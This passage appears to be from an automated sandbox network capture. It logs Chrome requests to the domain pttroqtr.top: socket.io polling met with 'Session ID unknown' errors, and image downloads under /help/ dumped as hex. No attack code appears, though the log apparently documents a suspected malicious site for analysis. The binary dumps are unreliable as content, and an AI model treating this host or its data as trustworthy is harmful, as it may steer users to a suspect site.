                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            57192.168.2.5497828.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjbBy&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:33 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:33 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            58192.168.2.5497838.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjbC1&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:34 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:34 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            59192.168.2.5497848.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:33 UTC361OUTGET /help/layout/images/32.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:34 UTC312INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:33 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 68762
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"10c9a-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:34 UTC16072INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 d0 00 00 03 66 08 06 00 00 00 31 1c e4 c4 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 66 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 33 2d 63 30 31 31 20 36 36 2e 31 34 35 36 36 31 2c 20 32 30 31 32 2f 30 32 2f 30 36 2d 31 34 3a 35 36 3a 32 37 20 20
                                                                                                                                                                                            Data Ascii: PNGIHDRf1tEXtSoftwareAdobe ImageReadyqe<fiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27
                                                                                                                                                                                            2024-09-28 03:39:34 UTC16384INData Raw: 66 86 8f ae 9b fd 60 fe 1a cd af 34 df f5 6e 3b ac 5e 93 e6 03 cd 39 e2 9a 69 ac 51 cc 1a 69 1a 29 4d d9 a4 35 db 69 1e d3 fc 46 b3 39 e7 b3 bf 65 c7 be 16 99 63 b5 e7 02 b6 c6 c9 1a 69 00 a0 48 6c c5 a4 ad 58 b5 95 9d 2f 51 8e c0 b3 e7 30 57 50 06 00 00 00 20 7a 68 a0 01 00 00 a1 d5 ad 5b 37 c9 e5 72 85 7f 02 e5 9f 09 34 e6 6d cd cf 35 ab 7a 6b 7d 9d e6 30 cd ad e2 46 cd db bb 64 ad e9 c0 a6 d5 64 22 74 4a fc 57 f3 53 cd 5e 9a df ad a6 66 a5 54 e5 5d a7 5f 8a 6b 88 5a 8f 7b 6f bb d8 2a 27 9b 7e 62 eb 13 8e d5 3c 2f bc fb bb dc 0e 16 d7 44 63 d3 b0 d6 a1 1c fe d4 fc e5 e4 7c a2 20 91 48 e4 1b 68 2c 00 50 64 d6 9d f8 3d cd 3d 94 22 f0 ec cd 08 c3 28 03 00 00 00 10 2d 34 d0 00 00 80 d0 ea de bd bb f4 e9 d3 47 b2 d9 6c 41 1b 69 e2 c3 06 88 a4 92 7e 3a 54 7b
                                                                                                                                                                                            Data Ascii: f`4n;^9iQi)M5iF9eciHlX/Q0WP zh[7r4m5zk}0Fdd"tJWS^fT]_kZ{o*'~b</Dc| Hh,Pd=="(-4GlAi~:T{
                                                                                                                                                                                            2024-09-28 03:39:34 UTC16384INData Raw: 8e c9 1e ec 4b d2 40 13 d3 ff 55 56 55 b5 e9 73 59 df 04 00 2b 65 63 1d 8f a7 0c 81 f4 27 cd 14 ca 00 00 00 00 84 17 0d 34 00 00 3f ab d1 1c a5 79 4f dc aa 95 4e 94 04 6b 60 90 a6 32 32 77 9e 9a 9a fc 2a a7 62 88 f5 e9 21 99 9b cf 95 d4 51 7b 89 24 42 f3 74 d2 76 5e d9 8b ea 57 69 f6 d3 9c a1 19 a7 69 2c c2 65 d9 48 86 8d 34 d7 6a ee 14 d7 50 33 90 bb 28 50 12 4b 34 bf 2f d2 7d bb 5c 9a a5 04 0d 34 4b f4 61 b2 5f a2 ed 13 65 2a b6 a3 81 06 00 56 e2 74 4d 1d 65 08 9c b9 9a ff a3 0c 00 00 00 40 b8 d1 40 03 00 f0 ab ef 6b 9e d0 dc 2f ac 6b 42 61 58 37 c9 01 51 39 d8 ea ea 6a a9 ad ad 95 a6 a6 a6 22 55 33 2e a9 23 f6 90 cc ad e7 49 ac 4f cf b0 95 6f 92 e6 46 71 8d 7b c7 68 fe a5 59 58 a4 cb fa 96 e6 7c 71 ab 9d ec 32 47 70 57 05 8a ee 13 71 93 68 c2 c2 9a 81
                                                                                                                                                                                            Data Ascii: K@UVUsY+ec'4?yONk`22w*b!Q{$Btv^Wii,eH4jP3(PK4/}\4Ka_e*VtMe@@k/kBaX7Q9j"U3.#IOoFq{hYX|q2GpWqh
                                                                                                                                                                                            2024-09-28 03:39:34 UTC16384INData Raw: 5d 3e ea 5c 24 5d e2 be 4e 26 d2 04 47 64 6c 8b 24 4e 3b 54 22 a3 9b 56 7a 8e 5a a3 da 2a ab ac 12 c4 e6 99 af 69 7e e5 9f 5a e1 64 53 1e d6 d4 cc e1 8c 45 16 35 6a 1e d7 4c a4 14 58 86 b9 e2 d6 c6 fd 51 f3 aa e6 9f 94 04 01 36 5a f3 9c a6 99 52 e4 dd 6f 34 bb 6a 66 53 8a c0 da 54 f3 bc f0 61 f4 42 b8 43 dc 6b bf 00 00 e4 15 77 fa 00 90 3f 4f 68 b6 d7 3c a6 19 46 39 32 b6 ba b8 17 78 f6 d4 3c 4d 39 d0 ad 55 f3 4d 8d 8d 9b 98 4c 39 fc cd 2f 3f d6 d8 b8 90 47 28 07 b2 e5 cb 8d 29 35 35 4b 0f 58 b3 f5 49 d3 a6 4d 5b e6 df b7 46 82 d6 d6 d6 de 27 6b 24 d2 d3 54 b3 78 82 8c fd f7 92 93 71 96 c5 1a 66 ec cf c6 e3 71 7f 4d 53 53 53 93 ff eb 6c 37 e8 2c 29 3a a2 41 2a 2f fc 96 94 1f b7 9f cc bf f1 41 59 70 f7 13 d2 35 7f 61 ee 0a 9e 4c e8 d7 96 90 91 6d 09 99 b7
                                                                                                                                                                                            Data Ascii: ]>\$]N&Gdl$N;T"VzZ*i~ZdSE5jLXQ6ZRo4jfSTaBCkw?Oh<F92x<M9UML9/?G()55KXIM[F'k$TxqfqMSSSl7,):A*/AYp5aLm
                                                                                                                                                                                            2024-09-28 03:39:34 UTC3538INData Raw: ad c2 fe 5d e6 88 cc 79 1e 02 00 60 84 29 d0 8c 07 05 1a 60 ba d5 f7 85 7f cd dc 37 da 4d 2a dc 3c 05 9a fe d4 d1 67 8f 1b 9e 27 9b 1b c7 2d 52 a0 01 98 21 cb 19 01 00 00 0b 70 79 dc 70 be 7b 59 26 73 a7 cc dd a2 15 6a ea 0e a2 2a d3 d4 c5 ae a9 78 e3 e8 a1 43 ca b1 99 df 67 be 9b 39 20 73 bd 87 03 00 00 80 31 70 cc 90 55 86 d7 cb 9b 66 5e 96 b9 b3 d1 40 1c 34 a4 6e d0 7a 40 b4 63 c5 9f 17 ed c8 27 00 18 09 36 d0 00 00 70 6b dc 76 c8 b2 d1 ee 1e da 21 da 5d 76 ab 0c a9 23 a0 96 f4 42 c8 df 33 e7 64 4e ca 7c 22 da 45 c8 0b 32 97 1a 3b 00 30 c3 6c a0 19 0f 36 d0 00 a3 60 9d 21 7b 67 1e 3d bc 86 be 8d b1 d8 40 c3 3f 54 b9 ac 8a 66 af ce 6c 1c ed 86 2d 85 1a 1b 68 00 66 8c 0d 34 00 00 dc 1a 17 0f 29 a7 45 bb 93 68 ae d9 d1 d6 56 57 b1 66 ee 39 f0 75 21 64 ad
                                                                                                                                                                                            Data Ascii: ]y`)`7M*<g'-R!pyp{Y&sj*xCg9 s1pUf^@4nz@c'6pkv!]v#B3dN|"E2;0l6`!{g=@?Tfl-hf4)EhVWf9u!d


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            60192.168.2.5497858.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:34 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjbam&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:34 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:34 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:34 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            61192.168.2.5497868.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:34 UTC669OUTPOST /socket.io/?EIO=4&transport=polling&t=P8sjbmh&sid=xZsOXWwlpa9sZhJdAEf0 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:34 UTC1OUTData Raw: 31
                                                                                                                                                                                            Data Ascii: 1
                                                                                                                                                                                            2024-09-28 03:39:34 UTC198INHTTP/1.1 400 Bad Request
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:34 GMT
                                                                                                                                                                                            Content-Type: application/json
                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            2024-09-28 03:39:34 UTC52INData Raw: 32 39 0d 0a 7b 22 63 6f 64 65 22 3a 31 2c 22 6d 65 73 73 61 67 65 22 3a 22 53 65 73 73 69 6f 6e 20 49 44 20 75 6e 6b 6e 6f 77 6e 22 7d 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                            Data Ascii: 29{"code":1,"message":"Session ID unknown"}0


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            62192.168.2.5497878.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:34 UTC599OUTGET /help/layout/images/36.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:34 UTC310INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:34 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 7852
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"1eac-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:34 UTC7852INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 1e 39 49 44 41 54 78 da ec dd 4f 72 db 46 da 07 60 64 2a fb f8 ab ca de ca 09 e2 9c c0 cc 2a 4b 2b ab d9 4c 95 e1 13 44 39 81 e9 13 44 3e 41 a8 aa d9 cc 2a d2 32 ab a1 4e 10 e9 04 23 ed 53 35 d6 05 92 0f 6d b5 12 8e 22 fe 69 10 04 5f 80 cf 53 c5 d2 8c 23 89 54 83 04 7e e8 3f 6f 7f f2 fb ef bf 57 00 00 0c cb 27 42 1c 00 80 10 07 00 80 10 07 00 80 10 07 00 20 c4 01 00 20 c4 01 00 20 c4 01 00 08 71 00 00 08 71 00 00 08 71 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 00 42 1c 00 80 10 07 00
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<9IDATxOrF`d**K+LD9D>A*2N#S5m"i_S#T~?oW'B qqqBBBB


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            63192.168.2.5497898.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:34 UTC599OUTGET /help/layout/images/37.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:34 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:34 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 15414
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"3c36-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:34 UTC15414INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 3b c3 49 44 41 54 78 da ec dd 6d 8c 2b d7 7d df f1 c3 da 90 a5 44 ce 52 b0 62 29 96 93 a5 64 f9 b9 32 79 13 a3 68 d5 3a cb 2d fa a2 70 dd 5e de 06 86 e0 02 c5 72 e3 b8 2f 02 3b 97 d7 05 82 28 49 7b 79 0b 27 36 82 36 97 b7 71 d3 a2 86 7b b9 09 fa 60 38 85 78 51 37 7d d1 22 97 0b 37 ea 8b ba 16 d7 46 24 47 96 2c 6e 12 39 76 22 57 5c 5b b1 6c d5 32 3b 7f ee 7f 76 0f cf ce 90 c3 e1 cc f0 61 be 1f 80 b8 12 c9 1d ce 9c 79 fa cd 39 67 ce 14 86 c3 a1 01 00 00 c0 6a f9 4b 14 01 00 00 00 21
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<;IDATxm+}DRb)d2yh:-p^r/;(I{y'66q{`8xQ7}"7F$G,n9v"W\[l2;vay9gjK!


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            64192.168.2.5497888.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:34 UTC599OUTGET /help/layout/images/38.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:34 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:34 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 11236
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            Cache-Control: public, max-age=86400
                                                                                                                                                                                            Last-Modified: Wed, 29 May 2024 10:14:36 GMT
                                                                                                                                                                                            ETag: W/"2be4-18fc3d82ee0"
                                                                                                                                                                                            2024-09-28 03:39:34 UTC11236INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 71 00 00 01 a1 08 06 00 00 00 0e 5b e2 8a 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 2b 71 49 44 41 54 78 da ec dd cb 75 db d8 96 06 60 54 af 3b b7 3b 02 b3 22 90 ee b4 27 a2 23 b0 6a d4 43 d3 11 58 15 81 e9 08 4a 8e c0 f4 f0 8e 4a 8e a0 e8 49 4f 2d 47 50 74 04 d7 8a c0 8d 2d 6d 5c b3 54 7a 10 e4 01 08 92 df b7 16 96 ea 21 91 20 08 1c fc 38 cf 9f be 7f ff 5e 01 00 b0 5b 7e 12 e2 00 00 84 38 00 00 84 38 00 00 84 38 00 00 21 0e 00 00 21 0e 00 00 21 0e 00 40 88 03 00 40 88 03 00 40 88 03 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 10 e2 00 00 84 38 00 00 84 38 00 00 84 38
                                                                                                                                                                                            Data Ascii: PNGIHDRq[pHYs.#.#x?vtEXtSoftwareAdobe ImageReadyqe<+qIDATxu`T;;"'#jCXJJIO-GPt-m\Tz! 8^[~888!!!@@@888


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            65192.168.2.5497918.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:34 UTC599OUTGET /help/layout/images/39.png HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:34 UTC311INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:34 GMT
                                                                                                                                                                                            Content-Type: image/png
                                                                                                                                                                                            Content-Length: 16498
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            Accept-Ranges: bytes
